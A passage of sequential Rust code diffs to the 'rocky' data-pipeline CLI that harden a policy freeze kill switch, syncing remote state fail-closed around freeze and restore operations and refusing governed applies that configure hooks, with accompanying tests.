+    // Execution-control identity (#1095(a)): `[run]`/`[reuse]`/`[resilience]`,
+    // symmetric with the apply choke-point. (Hooks are refused under a governed
+    // apply, #1095(c), not bound here.)
     let exec_control_identity = loaded_cfg
         .as_ref()
-        .map(|c| {
-            crate::commands::apply::execution_control_identity(
-                c,
-                config_path
-                    .parent()
-                    .unwrap_or_else(|| std::path::Path::new(".")),
-            )
-        })
+        .map(crate::commands::apply::execution_control_identity)
         .unwrap_or_default();
     // The env-resolved mask (finding C): the extras restrict it to the executed
     // models' classification tags. `env` is the plan's `--env`, so apply resolves

--- a/engine/crates/rocky-cli/src/commands/plan.rs
+++ b/engine/crates/rocky-cli/src/commands/plan.rs
@@ -1027,6 +1027,20 @@ pub fn compute_embedded_capabilities(
         .as_ref()
         .map(crate::commands::apply::governance_policy_identity)
         .unwrap_or_default();
+    // Execution-control identity (#1095): `[run]`/`[reuse]`/`[resilience]` +
+    // content-addressed `[hook]` set, resolved over the config's own directory so
+    // plan and apply hash the SAME referenced scripts for an unchanged project.
+    let exec_control_identity = loaded_cfg
+        .as_ref()
+        .map(|c| {
+            crate::commands::apply::execution_control_identity(
+                c,
+                config_path
+                    .parent()
+                    .unwrap_or_else(|| std::path::Path::new(".")),
+            )
+        })
+        .unwrap_or_default();
     // The env-resolved mask (finding C): the extras restrict it to the executed
     // models' classification tags. `env` is the plan's `--env`, so apply resolves
     // the same masks the reviewed env will apply.
@@ -1108,6 +1122,7 @@ pub fn compute_embedded_capabilities(
         &head.project.models,
         &identity,
         &governance_identity,
+        &exec_control_identity,
         &extras,
     );
 

--- a/engine/crates/rocky-cli/src/commands/policy.rs
+++ b/engine/crates/rocky-cli/src/commands/policy.rs
@@ -397,13 +397,19 @@ where
 /// switch, failing loudly beats appearing to engage and then silently
 /// disengaging.
 ///
-/// KNOWN LIMITATION (concurrency): this closes only the *sequential*
-/// between-runs clobber. The remote state object is a whole-file blob with **no
+/// KNOWN LIMITATION — no-CAS concurrent overwrite (finding 4): this closes only
+/// the *sequential* between-runs clobber. The remote state object is a
+/// whole-file blob published with a plain last-writer-wins upload and **no
 /// compare-and-swap**, so a concurrent writer — e.g. a `rocky run` whose
 /// start-download completed *before* this freeze — can still overwrite the
 /// freeze on its own end-upload (a cross-pod / concurrent-writer lost update).
-/// This does NOT make concurrent writes safe; it narrows the window, not closes
-/// it.
+/// This narrows the window, it does NOT make concurrent writes safe. A
+/// **reliable cross-pod kill switch** cannot be built on whole-file
+/// last-writer-wins; it needs one of: an atomic **compare-and-swap** publish
+/// (conditional PUT / `If-Match`), a **separate monotonic freeze object** that a
+/// run-upload can never clobber (a freeze marker written to its own key and only
+/// ever OR-ed into the gate), or **serialization** of writers (a lease/lock).
+/// Tracked as a follow-up; out of scope here.
 pub fn run_policy_freeze(
     config_path: &Path,
     state_path: &Path,
@@ -430,12 +436,28 @@ pub fn run_policy_freeze(
         eprintln!("warning: {note}");
     }
 
-    // Resolve the `[state]` backend. A missing/unreadable config degrades to the
-    // Local default (no remote sync) — freeze still records locally, matching
-    // the tolerant posture of `freeze_enforcement_notes` above.
-    let state_cfg = rocky_core::config::load_rocky_config(config_path)
-        .map(|cfg| cfg.state)
-        .unwrap_or_default();
+    // Resolve the `[state]` backend (finding 7, fail-loud). Only a genuinely
+    // ABSENT config selects the Local default (no remote sync) — a freeze
+    // recorded with no config file is a legitimate local-only record. ANY OTHER
+    // config error (malformed TOML, an unknown key tripping `deny_unknown_fields`,
+    // a missing env var — including the very `[state]` block that would make this
+    // a remote freeze) must ABORT: `unwrap_or_default()` would otherwise silently
+    // pick the Local backend, record the freeze LOCAL-only, exit 0 with no upload,
+    // and let a later remote download overwrite it. Mirrors the `[gc]
+    // physical_delete` fail-loud pattern.
+    let state_cfg = match rocky_core::config::load_rocky_config(config_path) {
+        Ok(cfg) => cfg.state,
+        Err(ConfigError::FileNotFound { .. }) => StateConfig::default(),
+        Err(e) => {
+            return Err(anyhow::Error::new(e).context(format!(
+                "refusing to record the policy freeze: {} failed to load, so the [state] backend \
+                 cannot be resolved — a malformed config must not silently record a LOCAL-only \
+                 freeze that a later remote download would overwrite (fail-closed). Fix the config \
+                 and re-run.",
+                config_path.display()
+            )));
+        }
+    };
     let remote_state = !matches!(state_cfg.backend, StateBackend::Local);
 
     // SEAM-SCOPED SYNC — download half. Pull the authoritative remote ledger
@@ -902,6 +924,37 @@ expect = \"deny\"
             "the freeze must be recorded in the ledger"
         );
         assert_eq!(freezes[0].principal, PolicyPrincipal::Agent);
+    }
+
+    /// Finding 7: a malformed config makes the `[state]` backend unresolvable.
+    /// The freeze must ABORT (fail-loud) rather than silently pick the Local
+    /// default and record a local-only freeze that a later remote download would
+    /// overwrite. (A genuinely ABSENT config still selects Local — covered by
+    /// `run_policy_freeze_records_and_succeeds_without_policy_block`.)
+    #[test]
+    fn run_policy_freeze_aborts_on_malformed_config() {
+        // A present-but-invalid config: `load_rocky_config` returns a
+        // non-FileNotFound error (unterminated string → TOML parse error).
+        let (dir, path) = config_with("x = \"unterminated\n");
+        let state = dir.path().join("state.redb");
+        let err = run_policy_freeze(
+            &path,
+            &state,
+            Some(PolicyPrincipal::Agent),
+            None,
+            false,
+            true,
+        )
+        .expect_err("a malformed config must abort the freeze, not record it local-only");
+        assert!(
+            err.to_string().contains("failed to load"),
+            "the abort must cite the config-load / [state]-resolution failure, got: {err}"
+        );
+        // The abort happens before the store is opened, so nothing is recorded.
+        assert!(
+            !state.exists(),
+            "a malformed-config freeze must not create/record a local-only freeze"
+        );
     }
 
     /// 🔴 FIX 7 regression: a scenario that sets an explicit `layer` (and no

--- a/engine/crates/rocky-cli/src/commands/policy.rs
+++ b/engine/crates/rocky-cli/src/commands/policy.rs
@@ -18,7 +18,7 @@ use std::path::Path;
 use anyhow::{Context, Result, bail};
 use rocky_compiler::compile::{self, CompilerConfig};
 use rocky_core::config::{
-    ConfigError, PolicyCapability, PolicyConfig, PolicyEffect, PolicyPrincipal,
+    ConfigError, PolicyCapability, PolicyConfig, PolicyEffect, PolicyPrincipal, StateBackend,
 };
 use rocky_core::policy::{self, ModelAttributes};
 use rocky_core::state::{PolicyDecisionRecord, StateStore};
@@ -331,6 +331,41 @@ fn serde_plain<T: serde::Serialize>(value: &T) -> String {
         .unwrap_or_default()
 }
 
+/// Run a state-sync future to completion from a **synchronous** command entry
+/// point.
+///
+/// `rocky policy freeze` is dispatched synchronously from within the CLI's async
+/// runtime, but `state_sync::{download,upload}_state` are async. We cannot make
+/// this function async without changing its (out-of-crate) call signature, and
+/// we cannot `block_on` the ambient runtime from one of its own worker threads
+/// (tokio's re-entrancy guard panics). So we drive the future on a dedicated OS
+/// thread with its own single-threaded runtime — correct whether or not there is
+/// an ambient runtime, and regardless of its flavor.
+fn block_on_state_sync<F>(fut: F) -> Result<(), rocky_core::state_sync::StateSyncError>
+where
+    F: std::future::Future<Output = Result<(), rocky_core::state_sync::StateSyncError>> + Send,
+{
+    std::thread::scope(|scope| {
+        scope
+            .spawn(|| {
+                let rt = match tokio::runtime::Builder::new_current_thread()
+                    .enable_all()
+                    .build()
+                {
+                    Ok(rt) => rt,
+                    Err(e) => return Err(rocky_core::state_sync::StateSyncError::Io(e)),
+                };
+                rt.block_on(fut)
+            })
+            .join()
+            .unwrap_or_else(|_| {
+                Err(rocky_core::state_sync::StateSyncError::Io(
+                    std::io::Error::other("state-sync worker thread panicked"),
+                ))
+            })
+    })
+}
+
 /// Execute `rocky policy freeze` — the kill switch.
 ///
 /// Flips every matched `(principal, scope)` to `deny` by recording a **freeze
@@ -341,6 +376,28 @@ fn serde_plain<T: serde::Serialize>(value: &T) -> String {
 /// `principal = None` freezes both principals (`agent` + `human`); `scope =
 /// None` freezes every model (`any`). The inverse (`lift = true`) records an
 /// unfreeze that supersedes a matching freeze — the normal way to lift one.
+///
+/// # Remote `[state]` integrity (S1, #1089)
+///
+/// The policy-decision ledger is one of the tables `rocky run` wholesale
+/// **downloads at start and uploads at end** when `[state]` is a remote backend.
+/// Left unsynced, a freeze recorded here would be silently reverted by the next
+/// run's start-download. So when the backend is remote we wrap the ledger write
+/// with a seam-scoped sync: **download-before-open** (pull the authoritative
+/// remote ledger, overwriting the local file, so we record on top of it) and
+/// **upload-after-commit** (push the freeze back). A remote-backend freeze
+/// therefore requires the backend to be reachable: a download failure aborts the
+/// command rather than recording a freeze that would be clobbered — for a kill
+/// switch, failing loudly beats appearing to engage and then silently
+/// disengaging.
+///
+/// KNOWN LIMITATION (concurrency): this closes only the *sequential*
+/// between-runs clobber. The remote state object is a whole-file blob with **no
+/// compare-and-swap**, so a concurrent writer — e.g. a `rocky run` whose
+/// start-download completed *before* this freeze — can still overwrite the
+/// freeze on its own end-upload (a cross-pod / concurrent-writer lost update).
+/// This does NOT make concurrent writes safe; it narrows the window, not closes
+/// it.
 pub fn run_policy_freeze(
     config_path: &Path,
     state_path: &Path,
@@ -365,6 +422,27 @@ pub fn run_policy_freeze(
     let notes = freeze_enforcement_notes(config_path, lift);
     for note in &notes {
         eprintln!("warning: {note}");
+    }
+
+    // Resolve the `[state]` backend. A missing/unreadable config degrades to the
+    // Local default (no remote sync) — freeze still records locally, matching
+    // the tolerant posture of `freeze_enforcement_notes` above.
+    let state_cfg = rocky_core::config::load_rocky_config(config_path)
+        .map(|cfg| cfg.state)
+        .unwrap_or_default();
+    let remote_state = !matches!(state_cfg.backend, StateBackend::Local);
+
+    // SEAM-SCOPED SYNC — download half. Pull the authoritative remote ledger
+    // (overwriting the local file) BEFORE opening the store, so the freeze is
+    // recorded on top of other pods' decisions rather than over an empty local.
+    if remote_state {
+        block_on_state_sync(rocky_core::state_sync::download_state(
+            &state_cfg, state_path,
+        ))
+        .with_context(|| {
+            "failed to download remote state before recording the policy freeze; \
+                 a remote-backend freeze requires the state backend to be reachable"
+        })?;
     }
 
     let store = StateStore::open(state_path)
@@ -418,6 +496,16 @@ pub fn run_policy_freeze(
             plan_id,
             reason,
         });
+    }
+
+    // SEAM-SCOPED SYNC — upload half. Push the freeze back to the remote backend
+    // so the next `rocky run`'s start-download inherits it instead of reverting
+    // it. Drop the store first to release the advisory lock and flush the file.
+    // Respects `[state] on_upload_failure` (default `skip` warns and continues).
+    drop(store);
+    if remote_state {
+        block_on_state_sync(rocky_core::state_sync::upload_state(&state_cfg, state_path))
+            .with_context(|| "failed to upload remote state after recording the policy freeze")?;
     }
 
     let output = PolicyFreezeOutput {
@@ -873,5 +961,66 @@ expcet = \"deny\"
         );
         let (_dir, path) = config_with(&body);
         assert!(run_policy_test(&path, true).is_err());
+    }
+
+    /// S1 (#1089): with a REMOTE `[state]` backend, the freeze wraps the ledger
+    /// write with a seam-scoped sync whose **download-before-open** half runs
+    /// first. A deliberately-misconfigured remote backend (`s3`, no bucket)
+    /// makes that download fail fast with `MissingConfig`, aborting the command
+    /// BEFORE the ledger is opened/written. This proves the download-before
+    /// half is wired and fatal: without it, freeze would record locally and
+    /// return Ok (only to be clobbered by the next run's start-download).
+    ///
+    /// (A faithful remote round-trip proving the *upload-after* half isn't
+    /// reachable from `rocky-cli`: the in-memory object-store seam is private to
+    /// `rocky-core`'s test build. The upload half is wired identically and
+    /// exercised by `rocky-core`'s `state_sync` round-trip tests.)
+    #[test]
+    fn freeze_remote_backend_download_before_is_wired_and_fatal() {
+        let body = format!("{POLICY}\n[state]\nbackend = \"s3\"\n");
+        let (dir, path) = config_with(&body);
+        let state = dir.path().join("state.redb");
+
+        let err = run_policy_freeze(
+            &path,
+            &state,
+            Some(PolicyPrincipal::Agent),
+            None,
+            false,
+            true,
+        )
+        .expect_err("a remote-backend freeze must abort when the backend is unreachable");
+        assert!(
+            err.to_string().contains("download remote state"),
+            "download-before-open must be wired and fatal on a remote backend: {err}"
+        );
+        assert!(
+            !state.exists(),
+            "no local state should be written when the download-before-open aborts"
+        );
+    }
+
+    /// S1 (#1089): the local (default) backend skips the remote-sync seam
+    /// entirely — the freeze records and exits Ok with no remote round-trip.
+    /// Paired with the test above (remote → attempted+fatal), this pins the
+    /// `!matches!(backend, Local)` guard branching both ways.
+    #[test]
+    fn freeze_local_backend_records_without_remote_sync() {
+        let body = format!("{POLICY}\n[state]\nbackend = \"local\"\n");
+        let (dir, path) = config_with(&body);
+        let state = dir.path().join("state.redb");
+
+        run_policy_freeze(
+            &path,
+            &state,
+            Some(PolicyPrincipal::Agent),
+            None,
+            false,
+            true,
+        )
+        .expect("a local-backend freeze must record without any remote round-trip");
+        let store = StateStore::open(&state).unwrap();
+        let freezes = policy::active_freezes(&store.list_policy_decisions().unwrap());
+        assert_eq!(freezes.len(), 1, "the freeze must be recorded locally");
     }
 }

--- a/engine/crates/rocky-cli/src/commands/policy.rs
+++ b/engine/crates/rocky-cli/src/commands/policy.rs
@@ -19,6 +19,7 @@ use anyhow::{Context, Result, bail};
 use rocky_compiler::compile::{self, CompilerConfig};
 use rocky_core::config::{
     ConfigError, PolicyCapability, PolicyConfig, PolicyEffect, PolicyPrincipal, StateBackend,
+    StateConfig, StateUploadFailureMode,
 };
 use rocky_core::policy::{self, ModelAttributes};
 use rocky_core::state::{PolicyDecisionRecord, StateStore};
@@ -341,7 +342,12 @@ fn serde_plain<T: serde::Serialize>(value: &T) -> String {
 /// (tokio's re-entrancy guard panics). So we drive the future on a dedicated OS
 /// thread with its own single-threaded runtime — correct whether or not there is
 /// an ambient runtime, and regardless of its flavor.
-fn block_on_state_sync<F>(fut: F) -> Result<(), rocky_core::state_sync::StateSyncError>
+///
+/// Exposed to the sibling `apply` module so the SYNC promote gate
+/// ([`crate::commands::apply::gate_promote_plan`]) — reached from two async
+/// entry points — can pull remote state before it reads the freeze ledger,
+/// without threading an async download through each caller.
+pub(crate) fn block_on_state_sync<F>(fut: F) -> Result<(), rocky_core::state_sync::StateSyncError>
 where
     F: std::future::Future<Output = Result<(), rocky_core::state_sync::StateSyncError>> + Send,
 {
@@ -498,14 +504,25 @@ pub fn run_policy_freeze(
         });
     }
 
-    // SEAM-SCOPED SYNC — upload half. Push the freeze back to the remote backend
-    // so the next `rocky run`'s start-download inherits it instead of reverting
-    // it. Drop the store first to release the advisory lock and flush the file.
-    // Respects `[state] on_upload_failure` (default `skip` warns and continues).
+    // SEAM-SCOPED SYNC — upload half, FAIL-CLOSED. Push the freeze back to the
+    // remote backend so the next `rocky run`'s start-download inherits it instead
+    // of reverting it. Drop the store first to release the advisory lock and
+    // flush the file. Durability is the whole point of a kill switch, so the
+    // upload is forced to `Fail` regardless of the configured `on_upload_failure`
+    // (default `skip`): a freeze that commits locally but never reaches the
+    // remote — while the command reports success — would leave every other pod
+    // unfrozen. A failed upload aborts (finding 5).
     drop(store);
     if remote_state {
-        block_on_state_sync(rocky_core::state_sync::upload_state(&state_cfg, state_path))
-            .with_context(|| "failed to upload remote state after recording the policy freeze")?;
+        let upload_cfg = StateConfig {
+            on_upload_failure: StateUploadFailureMode::Fail,
+            ..state_cfg.clone()
+        };
+        block_on_state_sync(rocky_core::state_sync::upload_state(
+            &upload_cfg,
+            state_path,
+        ))
+        .with_context(|| "failed to upload remote state after recording the policy freeze")?;
     }
 
     let output = PolicyFreezeOutput {

--- a/engine/crates/rocky-cli/src/commands/restore.rs
+++ b/engine/crates/rocky-cli/src/commands/restore.rs
@@ -878,6 +878,8 @@ pub(crate) async fn run_restore_apply_in(
         json,
         &S3RestoreStores,
         warehouse.as_ref(),
+        // Finding 1: reuse the SAME snapshot the adapter was built from.
+        Some(cfg),
     )
     .await
 }
@@ -895,6 +897,11 @@ pub(crate) async fn run_restore_apply_in_with(
     json: bool,
     stores: &dyn RestoreStores,
     warehouse: &dyn rocky_core::traits::WarehouseAdapter,
+    // Finding 1: the SAME config snapshot the caller already loaded (the outer
+    // `run_restore_apply_in` loaded it to build the recording-warehouse adapter).
+    // Threaded in so the freeze/policy gate + `[state]` sync read the config the
+    // adapter was built from, not a reload a `rocky.toml` swap could redirect.
+    loaded_cfg: Option<rocky_core::config::RockyConfig>,
 ) -> Result<()> {
     let plan_record = read_plan(root, plan_id)
         .with_context(|| format!("failed to read restore plan '{plan_id}'"))?;
@@ -922,21 +929,9 @@ pub(crate) async fn run_restore_apply_in_with(
         );
     }
 
-    // Policy can only tighten the gate. Fail-closed pre-check: a config-load
-    // ERROR would otherwise silently unenforce a possibly-configured
-    // `[policy]` block; a genuinely-missing config keeps NotConfigured.
-    let loaded_cfg = match rocky_core::config::load_rocky_config(config_path) {
-        Ok(cfg) => Some(cfg),
-        Err(rocky_core::config::ConfigError::FileNotFound { .. }) => None,
-        Err(e) => {
-            return Err(anyhow::anyhow!(e).context(format!(
-                "refusing to apply restore plan '{plan_id}': {} failed to load, so any \
-                 configured [policy] rules cannot be enforced (fail-closed). Fix the config and \
-                 re-run `rocky apply {plan_id}`.",
-                config_path.display()
-            )));
-        }
-    };
+    // Policy can only tighten the gate. `loaded_cfg` is the caller's single
+    // snapshot (finding 1) — a genuine config-load error already fails closed at
+    // the outer `run_restore_apply_in` before the adapter is built.
     let touched: BTreeMap<String, PolicyCapability> = plan
         .restorations
         .iter()
@@ -1540,6 +1535,7 @@ mod tests {
                 true,
                 &stores,
                 &fresh_duckdb(),
+                rocky_core::config::load_rocky_config(&config).ok(),
             )
             .await
             .unwrap();
@@ -1580,6 +1576,7 @@ mod tests {
                 true,
                 &stores,
                 &fresh_duckdb(),
+                rocky_core::config::load_rocky_config(&config).ok(),
             )
             .await
             .unwrap();
@@ -1677,6 +1674,7 @@ mod tests {
                 true,
                 &SharedStore(cas.clone()),
                 &fresh_duckdb(),
+                rocky_core::config::load_rocky_config(&config).ok(),
             )
             .await
             .unwrap();
@@ -1903,6 +1901,7 @@ mod tests {
                 true,
                 &SharedStore(cas.clone()),
                 &fresh_duckdb(),
+                rocky_core::config::load_rocky_config(&config).ok(),
             )
             .await
             .expect_err("apply must refuse an unreviewed restore plan");
@@ -1931,6 +1930,7 @@ mod tests {
                 true,
                 &SharedStore(cas.clone()),
                 &fresh_duckdb(),
+                rocky_core::config::load_rocky_config(&config).ok(),
             )
             .await
             .unwrap();

--- a/engine/crates/rocky-cli/src/commands/restore.rs
+++ b/engine/crates/rocky-cli/src/commands/restore.rs
@@ -72,7 +72,9 @@ use rocky_iceberg::uniform_writer::{
 };
 use rocky_ir::ModelIr;
 
-use crate::commands::apply::{PolicyGate, ai_plan_is_reviewed, evaluate_apply_policy};
+use crate::commands::apply::{
+    PolicyGate, ai_plan_is_reviewed, evaluate_apply_policy, sync_remote_ledger_before_gate,
+};
 use crate::commands::gc::{check_recipe_produces_output, gc_models_dir};
 use crate::commands::review::record_plan_review_escalation;
 use crate::commands::run_content_addressed::{build_object_store, table_relative_add_path};
@@ -943,6 +945,13 @@ pub(crate) async fn run_restore_apply_in_with(
         .map(|r| (r.model_name.clone(), PolicyCapability::Restore))
         .collect();
     let models_dir = gc_models_dir(loaded_cfg.as_ref(), config_path);
+    // Finding 1: `rocky restore` mutates state, so a cross-pod freeze must gate
+    // it too. Pull the authoritative remote freeze/budget ledger BEFORE the gate
+    // reads it (fail-closed, remote-only), reusing the apply seam's guarded sync
+    // — skipped when the gate won't read the ledger (no policy / empty touched —
+    // finding 8). Downloading the fresh remote state also gives the restore its
+    // authoritative tombstone ledger to replay from.
+    sync_remote_ledger_before_gate(config_path, state_path, &touched).await?;
     let gate = evaluate_apply_policy(
         config_path,
         plan_id,

--- a/engine/crates/rocky-cli/src/commands/restore.rs
+++ b/engine/crates/rocky-cli/src/commands/restore.rs
@@ -72,10 +72,7 @@ use rocky_iceberg::uniform_writer::{
 };
 use rocky_ir::ModelIr;
 
-use crate::commands::apply::{
-    PolicyGate, ai_plan_is_reviewed, evaluate_apply_policy_with_policy,
-    sync_remote_ledger_before_gate,
-};
+use crate::commands::apply::{PolicyGate, ai_plan_is_reviewed, evaluate_apply_policy_with_policy};
 use crate::commands::gc::{check_recipe_produces_output, gc_models_dir};
 use crate::commands::review::record_plan_review_escalation;
 use crate::commands::run_content_addressed::{build_object_store, table_relative_add_path};
@@ -946,16 +943,19 @@ pub(crate) async fn run_restore_apply_in_with(
         .map(|r| (r.model_name.clone(), PolicyCapability::Restore))
         .collect();
     let models_dir = gc_models_dir(loaded_cfg.as_ref(), config_path);
-    // Finding 1: `rocky restore` mutates state, so a cross-pod freeze must gate
-    // it too. Pull the authoritative remote freeze/budget ledger BEFORE the gate
-    // reads it (fail-closed, remote-only), reusing the apply seam's guarded sync
-    // — skipped when the gate won't read the ledger (no policy / empty touched —
-    // finding 8). Downloading the fresh remote state also gives the restore its
-    // authoritative tombstone ledger to replay from. Both the sync decision and
-    // the gate use the SAME `loaded_cfg` snapshot (finding A — config TOCTOU).
-    if let Some(cfg) = &loaded_cfg {
-        sync_remote_ledger_before_gate(cfg, state_path, &touched).await?;
-    }
+    // Finding 2a (download-before, UNCONDITIONAL): `rocky restore` reads the
+    // TOMBSTONES ledger from local state, so for a remote backend it must pull the
+    // authoritative remote state regardless of `[policy]` presence — the earlier
+    // policy-gated sync would let a no-`[policy]` restore read STALE local
+    // tombstones and falsely refuse a valid restore. This refresh also gives the
+    // freeze/budget gate below the current ledger. Fail-closed. Uses the SAME
+    // `loaded_cfg` snapshot the gate uses (finding A — config TOCTOU).
+    crate::commands::apply::download_remote_ledger_unconditional(
+        loaded_cfg.as_ref(),
+        state_path,
+        "restore apply",
+    )
+    .await?;
     let gate = evaluate_apply_policy_with_policy(
         loaded_cfg.as_ref().and_then(|c| c.policy.as_ref()),
         plan_id,
@@ -982,6 +982,18 @@ pub(crate) async fn run_restore_apply_in_with(
         .with_context(|| format!("failed to open state store at {}", state_path.display()))?;
     let output =
         execute_restore_apply(&store, stores, warehouse, plan_id, &plan, Utc::now()).await?;
+    // Drop the store to release the advisory lock / flush the file before upload.
+    drop(store);
+
+    // Finding 2b (upload-after): restore reinstated the artifact ledger row +
+    // its tombstone locally; push them to the remote backend (fail-closed) so the
+    // next run's start-download does not silently erase the restoration.
+    crate::commands::apply::upload_remote_ledger_fail_closed(
+        loaded_cfg.as_ref(),
+        state_path,
+        "restore apply",
+    )
+    .await?;
 
     if json {
         println!("{}", serde_json::to_string_pretty(&output)?);

--- a/engine/crates/rocky-cli/src/commands/restore.rs
+++ b/engine/crates/rocky-cli/src/commands/restore.rs
@@ -73,7 +73,8 @@ use rocky_iceberg::uniform_writer::{
 use rocky_ir::ModelIr;
 
 use crate::commands::apply::{
-    PolicyGate, ai_plan_is_reviewed, evaluate_apply_policy, sync_remote_ledger_before_gate,
+    PolicyGate, ai_plan_is_reviewed, evaluate_apply_policy_with_policy,
+    sync_remote_ledger_before_gate,
 };
 use crate::commands::gc::{check_recipe_produces_output, gc_models_dir};
 use crate::commands::review::record_plan_review_escalation;
@@ -950,10 +951,13 @@ pub(crate) async fn run_restore_apply_in_with(
     // reads it (fail-closed, remote-only), reusing the apply seam's guarded sync
     // — skipped when the gate won't read the ledger (no policy / empty touched —
     // finding 8). Downloading the fresh remote state also gives the restore its
-    // authoritative tombstone ledger to replay from.
-    sync_remote_ledger_before_gate(config_path, state_path, &touched).await?;
-    let gate = evaluate_apply_policy(
-        config_path,
+    // authoritative tombstone ledger to replay from. Both the sync decision and
+    // the gate use the SAME `loaded_cfg` snapshot (finding A — config TOCTOU).
+    if let Some(cfg) = &loaded_cfg {
+        sync_remote_ledger_before_gate(cfg, state_path, &touched).await?;
+    }
+    let gate = evaluate_apply_policy_with_policy(
+        loaded_cfg.as_ref().and_then(|c| c.policy.as_ref()),
         plan_id,
         plan_record.enforcement_principal(runtime_principal),
         &touched,

--- a/engine/crates/rocky-cli/src/commands/restore.rs
+++ b/engine/crates/rocky-cli/src/commands/restore.rs
@@ -975,14 +975,19 @@ pub(crate) async fn run_restore_apply_in_with(
 
     let store = StateStore::open(state_path)
         .with_context(|| format!("failed to open state store at {}", state_path.display()))?;
-    let output =
-        execute_restore_apply(&store, stores, warehouse, plan_id, &plan, Utc::now()).await?;
+    // Finding 5: restore MUTATES the object store + the local artifact/tombstone
+    // ledger as it executes, so a mid-run failure can still have committed state.
+    // CAPTURE the result (don't `?` it), release the store lock, ALWAYS run the
+    // fail-closed upload-after, THEN handle the captured result — a failure must
+    // not skip the durability upload (else the next run's start-download reverts
+    // the partial restoration).
+    let exec_result =
+        execute_restore_apply(&store, stores, warehouse, plan_id, &plan, Utc::now()).await;
     // Drop the store to release the advisory lock / flush the file before upload.
     drop(store);
 
-    // Finding 2b (upload-after): restore reinstated the artifact ledger row +
-    // its tombstone locally; push them to the remote backend (fail-closed) so the
-    // next run's start-download does not silently erase the restoration.
+    // Finding 2b + 5 (upload-after, unconditional): push whatever restore wrote to
+    // local state to the remote backend (fail-closed) so it is durable.
     crate::commands::apply::upload_remote_ledger_fail_closed(
         loaded_cfg.as_ref(),
         state_path,
@@ -990,6 +995,7 @@ pub(crate) async fn run_restore_apply_in_with(
     )
     .await?;
 
+    let output = exec_result?;
     if json {
         println!("{}", serde_json::to_string_pretty(&output)?);
     } else {

--- a/engine/crates/rocky-cli/src/commands/run.rs
+++ b/engine/crates/rocky-cli/src/commands/run.rs
@@ -1055,6 +1055,30 @@ async fn apply_grants_with_catalog_client_fallback(
     }
 }
 
+/// #1095(c): a governed apply must not execute `[hook]` / `[hook.webhooks]`
+/// side effects. Hook commands fire at pipeline-start — BEFORE the
+/// execution-fingerprint choke-point — and a replication-only apply never
+/// reaches the gate at all, so binding hooks into the fingerprint could not
+/// prevent a post-review hook from running arbitrary shell commands. A governed
+/// run that configures any hook or webhook is therefore REFUSED before any hook
+/// is built or fired, rather than firing unreviewed side effects. A bare
+/// `rocky run` / human apply is ungoverned (`governed == false`) → hooks fire as
+/// before.
+pub(crate) fn refuse_governed_side_effects(
+    governed: bool,
+    hooks: &rocky_core::hooks::HooksConfig,
+) -> Result<()> {
+    if governed && !(hooks.hooks.is_empty() && hooks.webhooks.is_empty()) {
+        anyhow::bail!(
+            "refusing a governed apply that configures `[hook]`/`[hook.webhooks]`: hook \
+             commands fire at pipeline-start, before the execution-fingerprint gate (and a \
+             replication-only apply never reaches it), so a post-plan hook edit would run \
+             unreviewed commands. Remove the hooks, or apply outside the agent-policy plane."
+        );
+    }
+    Ok(())
+}
+
 /// Execute `rocky run` — full pipeline.
 #[allow(clippy::too_many_arguments)]
 #[tracing::instrument(skip_all, name = "run", fields(run_id))]
@@ -1214,6 +1238,11 @@ pub async fn run(
         config_path.display()
     ))?;
     let config_hash = crate::output::config_fingerprint(config_path);
+
+    // #1095(c): refuse a governed apply that configures `[hook]`/`[hook.webhooks]`
+    // BEFORE any hook is built or fired — hooks run outside (and before) the
+    // execution-fingerprint gate, so they cannot be enforced by fingerprint.
+    refuse_governed_side_effects(governed_ctx.is_some(), &rocky_cfg.hooks)?;
 
     // Governed-apply TOCTOU gate (E) — pairs the plan-authorized IR fingerprint
     // with THIS run's config identity; verified at the execution choke-point
@@ -12066,6 +12095,38 @@ merge_keys = ["id"]
         .unwrap()
     }
 
+    /// #1095(c): a governed run REFUSES when hooks/webhooks are configured (they
+    /// fire before the fingerprint gate), while a non-governed run and a governed
+    /// run with no hooks proceed.
+    #[test]
+    fn governed_run_refuses_configured_hooks() {
+        use rocky_core::hooks::{HookConfig, HookConfigOrList, HooksConfig};
+        let with_hook = HooksConfig {
+            webhooks: Default::default(),
+            hooks: [(
+                "on_pipeline_start".to_string(),
+                HookConfigOrList::Single(HookConfig {
+                    command: "scripts/notify.sh".to_string(),
+                    timeout_ms: 1000,
+                    on_failure: Default::default(),
+                    env: Default::default(),
+                }),
+            )]
+            .into_iter()
+            .collect(),
+        };
+        let empty = HooksConfig {
+            webhooks: Default::default(),
+            hooks: Default::default(),
+        };
+        // Governed + hooks → refuse (before any hook fires).
+        assert!(super::refuse_governed_side_effects(true, &with_hook).is_err());
+        // Non-governed + hooks → allowed (bare `rocky run` fires hooks as before).
+        assert!(super::refuse_governed_side_effects(false, &with_hook).is_ok());
+        // Governed + no hooks → allowed.
+        assert!(super::refuse_governed_side_effects(true, &empty).is_ok());
+    }
+
     /// Run one governed `execute_models` apply under a fixed gate and return the
     /// `Result` — the shared driver for the extras kill-checks below.
     #[cfg(feature = "duckdb")]
@@ -12556,11 +12617,8 @@ merge_keys = ["id"]
         let resolved_mask: std::collections::BTreeMap<String, rocky_ir::MaskStrategy> =
             std::collections::BTreeMap::new();
         // Match the plan side (`compute_embedded_capabilities` → plan.rs), which
-        // binds the execution-control identity over the config's own directory.
-        let ec = crate::commands::apply::execution_control_identity(
-            &cfg,
-            config_path.parent().unwrap(),
-        );
+        // binds the execution-control identity (run/reuse/resilience).
+        let ec = crate::commands::apply::execution_control_identity(&cfg);
         let apply_fp = exec_choke_fingerprint(&models, &identity, &gov, &ec, &resolved_mask);
 
         assert_eq!(
@@ -12620,11 +12678,8 @@ merge_keys = ["id"]
         let gov = crate::commands::apply::governance_policy_identity(&cfg);
         let resolved_mask = cfg.resolve_mask_for_env(None);
         // Match the plan side (`compute_embedded_capabilities` → plan.rs), which
-        // binds the execution-control identity over the config's own directory.
-        let ec = crate::commands::apply::execution_control_identity(
-            &cfg,
-            config_path.parent().unwrap(),
-        );
+        // binds the execution-control identity (run/reuse/resilience).
+        let ec = crate::commands::apply::execution_control_identity(&cfg);
         let apply_fp = exec_choke_fingerprint(&models, &identity, &gov, &ec, &resolved_mask);
         assert_eq!(
             caps.models_fingerprint.as_deref(),

--- a/engine/crates/rocky-cli/src/commands/run.rs
+++ b/engine/crates/rocky-cli/src/commands/run.rs
@@ -1819,7 +1819,10 @@ pub async fn run(
                     .flat_map(|t| shadow_gate_target_names(&t.name, shadow_config))
             })
             .collect();
-        ctx.gate_replication_targets(&replication_targets, &state_store)?;
